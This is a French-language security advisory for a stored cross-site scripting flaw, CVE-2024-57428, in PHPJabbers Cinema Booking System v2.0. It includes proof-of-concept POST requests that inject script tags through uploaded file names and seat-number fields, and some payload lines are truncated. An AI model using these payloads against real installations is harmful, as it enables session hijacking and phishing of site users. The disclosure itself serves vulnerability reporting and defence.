
CVE-2024-57428 : PHPJabbers Cinema Booking System v2.0 souffre d'un XSS stocké, permettant une injection JavaScript persistante pour des attaques de phishing et de malwares.
Une vulnérabilité de cross-site scripting (XSS) stocké dans PHPJabbers Cinema Booking System v2.0 existe en raison d'une entrée non nettoyée dans les champs de téléchargement de fichiers (event_img, seat_maps) et les configurations de numéros de sièges (number[new_X] dans pjActionCreate). Les attaquants peuvent injecter du JavaScript persistant, conduisant à du phishing, à l'injection de logiciels malveillants et au détournement de session.
Paramètre vulnérable : event_img et seat_maps's file name
Le XSS stocké est plus grave que le XSS réfléchi, car il affecte tous les utilisateurs qui accèdent au contenu injecté. Il pourrait être exploité pour des attaques de phishing persistantes, le vol de session ou l'injection de logiciels malveillants sur une large base d'utilisateurs.
Payload : \">
POST /CinemaBookingDev/index.php?controller=pjAdminEvents&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 38611
[SNIP]
------WebKitFormBoundaryKOsvqJhAGpZAt33t
Content-Disposition: form-data; name="event_img"; filename="luffy.jpg\">"
Content-Type: image/jpeg
Payload : "><script>alert(x)</script>
POST /CinemaBookingDev/index.php?controller=pjAdminVenues&action=pjActionCreate HTTP/1.1
Host: 127.0.0.1
Content-Length: 1812
[SNIP]
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="seats_count"
11
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_1]"
1"><script>alert(1)</script>1
------WebKitFormBoundaryip9Mc6LkKna3bpSD
Content-Disposition: form-data; name="number[new_2]"
2"><script>alert(2)</script>2